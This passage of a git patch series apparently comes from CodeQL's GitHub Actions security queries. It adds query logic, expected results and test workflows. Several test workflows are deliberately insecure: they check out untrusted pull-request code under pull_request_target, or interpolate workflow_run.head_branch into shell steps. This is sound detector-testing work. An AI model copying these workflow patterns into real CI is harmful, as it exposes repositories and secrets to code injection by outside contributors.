.github/workflows/poisonable_steps.yml@29:14:29:42 | +| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:30:9:31:6 | .github/workflows/poisonable_steps.yml@30:9:31:6 | +| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:14:30:46 | .github/workflows/poisonable_steps.yml@30:14:30:46 | +| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:31:9:32:6 | .github/workflows/poisonable_steps.yml@31:9:32:6 | +| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:14:31:44 | .github/workflows/poisonable_steps.yml@31:14:31:44 | +| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:32:9:33:6 | .github/workflows/poisonable_steps.yml@32:9:33:6 | +| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:14:32:44 | .github/workflows/poisonable_steps.yml@32:14:32:44 | +| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:33:9:34:6 | .github/workflows/poisonable_steps.yml@33:9:34:6 | +| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:14:33:35 | .github/workflows/poisonable_steps.yml@33:14:33:35 | +| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:34:9:35:6 | .github/workflows/poisonable_steps.yml@34:9:35:6 | +| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:14:34:52 | .github/workflows/poisonable_steps.yml@34:14:34:52 | +| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:35:9:36:6 | .github/workflows/poisonable_steps.yml@35:9:36:6 | +| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:14:35:26 | .github/workflows/poisonable_steps.yml@35:14:35:26 | +| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:36:9:37:6 | .github/workflows/poisonable_steps.yml@36:9:37:6 | +| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:14:36:86 | .github/workflows/poisonable_steps.yml@36:14:36:86 | +| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:37:9:38:6 | .github/workflows/poisonable_steps.yml@37:9:38:6 | +| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:14:37:51 | .github/workflows/poisonable_steps.yml@37:14:37:51 | +| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:38:9:39:6 | .github/workflows/poisonable_steps.yml@38:9:39:6 | +| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:14:38:45 | .github/workflows/poisonable_steps.yml@38:14:38:45 | +| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:39:9:40:6 | .github/workflows/poisonable_steps.yml@39:9:40:6 | +| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:14:39:55 | .github/workflows/poisonable_steps.yml@39:14:39:55 | +| .github/workflows/poisonable_steps.yml:40:9:40:74 | Run Step | .github/workflows/poisonable_steps.yml:40:9:40:74 | .github/workflows/poisonable_steps.yml@40:9:40:74 | +| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:14:40:73 | .github/workflows/poisonable_steps.yml@40:14:40:73 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -887,7 +1030,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | -| .github/workflows/poisonable_steps.yml:1:1:29:43 | on: push | +| .github/workflows/poisonable_steps.yml:1:1:40:74 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | From e23054292b86b7b1005595849b19e267f44a95bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 11:49:02 +0200 Subject: [PATCH 0388/1267] feat(tests): Add new tests Add new tests to verify that even if a job is privileged, if the vulnerability takes place in a different one, it should be considered as non-priveleged and reported as Cache Poisoning instead of Untrusted Checkout --- .../CWE-349/.github/workflows/test21.yml | 44 +++++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 2 + .../CWE-829/.github/workflows/test8.yml | 44 +++++++++++++++++++ .../UntrustedCheckoutCritical.expected | 1 + .../CWE-829/UntrustedCheckoutMedium.expected | 1 + 5 files changed, 92 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml new file mode 100644 index 00000000000..381cc16a6d1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/test21.yml @@ -0,0 +1,44 @@ +name: OpenAPI +on: + push: + branches: + - master + tags: + - 'v*' + pull_request_target: + +permissions: {} + +jobs: + + openapi-base: + name: OpenAPI - BASE + if: ${{ github.base_ref != '' }} + runs-on: ubuntu-latest + permissions: read-all + steps: + - name: Checkout repository + uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + fetch-depth: 0 + - name: Generate openapi.json + run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" + + publish-unstable: + name: OpenAPI - Publish Unstable Spec + if: ${{ github.event_name != 'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }} + runs-on: ubuntu-latest + needs: + - openapi-base + steps: + - name: Upload openapi.json (unstable) to repository server + uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7 + with: + host: "${{ secrets.REPO_HOST }}" + username: "${{ secrets.REPO_USER }}" + key: "${{ secrets.REPO_KEY }}" + source: openapi-head/openapi.json + strip_components: 1 + target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}" diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 2580531afd3..eb1412bf0e2 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected @@ -155,6 +155,7 @@ edges | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | #select | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | | .github/workflows/poc3.yml:38:7:40:4 | Run Step | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | @@ -177,3 +178,4 @@ edges | .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | | .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test21.yml:26:9:29:2 | Run Step | .github/workflows/test21.yml:20:9:26:6 | Uses Step | .github/workflows/test21.yml:26:9:29:2 | Run Step | Potential cache poisoning in the context of the default branch | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml new file mode 100644 index 00000000000..381cc16a6d1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml @@ -0,0 +1,44 @@ +name: OpenAPI +on: + push: + branches: + - master + tags: + - 'v*' + pull_request_target: + +permissions: {} + +jobs: + + openapi-base: + name: OpenAPI - BASE + if: ${{ github.base_ref != '' }} + runs-on: ubuntu-latest + permissions: read-all + steps: + - name: Checkout repository + uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + fetch-depth: 0 + - name: Generate openapi.json + run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" + + publish-unstable: + name: OpenAPI - Publish Unstable Spec + if: ${{ github.event_name != 'pull_request_target' && !startsWith(github.ref, 'refs/tags/v') && contains(github.repository_owner, 'jellyfin') }} + runs-on: ubuntu-latest + needs: + - openapi-base + steps: + - name: Upload openapi.json (unstable) to repository server + uses: appleboy/scp-action@917f8b81dfc1ccd331fef9e2d61bdc6c8be94634 # v0.1.7 + with: + host: "${{ secrets.REPO_HOST }}" + username: "${{ secrets.REPO_USER }}" + key: "${{ secrets.REPO_KEY }}" + source: openapi-head/openapi.json + strip_components: 1 + target: "/srv/incoming/openapi/unstable/jellyfin-openapi-${{ env.JELLYFIN_VERSION }}" diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index f2d229e80bb..7b758b0da6d 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected @@ -325,6 +325,7 @@ edges | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | | .github/workflows/test7.yml:39:9:49:6 | Run Step: bench-command | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:29:2 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:33:9:37:34 | Run Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index e0164eafac8..05931dfe312 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected @@ -6,3 +6,4 @@ | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From f4dd771d1cc1dd791e4d74ffed89093bf5cdc455 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 11:49:18 +0200 Subject: [PATCH 0389/1267] feat(models): Add models for ssh-action --- ql/lib/ext/manual/appleboy_ssh-action.model.yml | 8 ++++++++ 1 file changed, 8 insertions(+) create mode 100644 ql/lib/ext/manual/appleboy_ssh-action.model.yml diff --git a/ql/lib/ext/manual/appleboy_ssh-action.model.yml b/ql/lib/ext/manual/appleboy_ssh-action.model.yml new file mode 100644 index 00000000000..c489f8edc85 --- /dev/null +++ b/ql/lib/ext/manual/appleboy_ssh-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: actionsSinkModel + data: + - ["appleboy/ssh-action", "*", "input.script", "code-injection", "manual"] + - ["appleboy/ssh-action", "*", "input.envs", "envvar-injection", "manual"] + From f1d1c1e55a2c07e756dd7fa4635cc29c2a248798 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 11:49:37 +0200 Subject: [PATCH 0390/1267] Bump QL versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 554ef6bbe7f..3d20e00ddde 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.15 +version: 0.1.16 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e72b14fb358..6b41b38f9a4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.15 +version: 0.1.16 groups: [actions, queries] suites: codeql-suites extractor: javascript From 53b88627e5eb15bcee5f524fb7884321dbb77eae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 12:15:49 +0200 Subject: [PATCH 0391/1267] feat(core): Exclude worflow_run#branches#default branch from externally triggerable events --- ql/lib/codeql/actions/Helper.qll | 8 ++++++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 13 ++++++++++++- .../codeql/actions/security/CachePoisoningQuery.qll | 11 +---------- .../.github/workflows/workflow_run_branches1.yml | 13 +++++++++++++ .../.github/workflows/workflow_run_branches2.yml | 13 +++++++++++++ .../.github/workflows/workflow_run_branches3.yml | 12 ++++++++++++ .../Security/CWE-094/CodeInjectionCritical.expected | 4 ++++ .../Security/CWE-094/CodeInjectionMedium.expected | 5 +++++ 8 files changed, 68 insertions(+), 11 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index 3c7091d2a85..b08b62c8a58 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -1,5 +1,6 @@ private import codeql.actions.Ast private import codeql.Locations +import codeql.actions.config.Config private import codeql.actions.security.ControlChecks bindingset[expr] @@ -264,3 +265,10 @@ predicate outputsPartialFileContent(string snippet) { ".*" ]) } + +string defaultBranchNames() { + repositoryDataModel(_, result) + or + not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and + result = ["main", "master"] +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index bb31e198cc6..e2dfd6076df 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -710,7 +710,18 @@ class EventImpl extends AstNodeImpl, TEventNode { /** Holds if the event can be triggered by an external actor. */ predicate isExternallyTriggerable() { // the job is triggered by an event that can be triggered externally - externallyTriggerableEventsDataModel(this.getName()) + // except for workflow_run which requires additional checks + externallyTriggerableEventsDataModel(this.getName()) and + not this.getName() = "workflow_run" + or + this.getName() = "workflow_run" and + // workflow_run cannot be externally triggered if they triggering workflow runs in the context of the default branch + // since an attacker can change the triggering workflow from any event to `pull_request` to trigger the workflow + // but in that case, the triggering workflow will run in the context of the PR head branch + ( + not exists(this.getAPropertyValue("branches")) or + not this.getAPropertyValue("branches") = defaultBranchNames() + ) or // the event is `workflow_call` and there is a caller workflow that can be triggered externally this.getName() = "workflow_call" and diff --git a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll index 1a3e7b2b2f7..29c0ed4feed 100644 --- a/ql/lib/codeql/actions/security/CachePoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/CachePoisoningQuery.qll @@ -1,5 +1,6 @@ import actions import codeql.actions.config.Config +import codeql.actions.Helper string defaultBranchTriggerEvent() { result = @@ -11,16 +12,6 @@ string defaultBranchTriggerEvent() { ] } -string defaultBranchNames() { - exists(string default_branch_name | - repositoryDataModel(_, default_branch_name) and - result = default_branch_name - ) - or - not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and - result = ["main", "master"] -} - predicate runsOnDefaultBranch(Event e) { ( e.getName() = defaultBranchTriggerEvent() and diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml new file mode 100644 index 00000000000..7920e649da8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches1.yml @@ -0,0 +1,13 @@ +name: Self-hosted runner (AMD mi250 CI caller) + +on: + workflow_run: + workflows: ["Test"] + branches: ["main"] + types: [completed] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.workflow_run.head_branch }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml new file mode 100644 index 00000000000..601ad558fa0 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches2.yml @@ -0,0 +1,13 @@ +name: Self-hosted runner (AMD mi250 CI caller) + +on: + workflow_run: + workflows: ["Test"] + branches: "main" + types: [completed] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.workflow_run.head_branch }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml new file mode 100644 index 00000000000..833d655d3e5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches3.yml @@ -0,0 +1,12 @@ +name: Self-hosted runner (AMD mi250 CI caller) + +on: + workflow_run: + workflows: ["Test"] + types: [completed] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.workflow_run.head_branch }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 6dfb91f7275..863fa67f116 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -295,6 +295,9 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | @@ -388,3 +391,4 @@ subpaths | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 11036e7f8eb..f2fd5923034 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -295,6 +295,9 @@ nodes | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | semmle.label | github.event.workflow_run.head_commit.committer.name | | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | semmle.label | github.event.workflow_run.head_repository.description | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | @@ -325,3 +328,5 @@ subpaths | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | +| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | From 090b3d41d165c3d3d2d2deef8e12592515748790 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 13:08:54 +0200 Subject: [PATCH 0392/1267] Fix branches logic --- ql/lib/codeql/actions/ast/internal/Ast.qll | 2 +- .../query-tests/Security/CWE-094/CodeInjectionCritical.expected | 2 ++ .../query-tests/Security/CWE-094/CodeInjectionMedium.expected | 1 + 3 files changed, 4 insertions(+), 1 deletion(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index e2dfd6076df..9416b39e105 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -720,7 +720,7 @@ class EventImpl extends AstNodeImpl, TEventNode { // but in that case, the triggering workflow will run in the context of the PR head branch ( not exists(this.getAPropertyValue("branches")) or - not this.getAPropertyValue("branches") = defaultBranchNames() + this.getAPropertyValue("branches").matches("%*%") ) or // the event is `workflow_call` and there is a caller workflow that can be triggered externally diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 863fa67f116..3330ad89311 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -298,6 +298,7 @@ nodes | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action1/action.yml:7:19:7:55 | 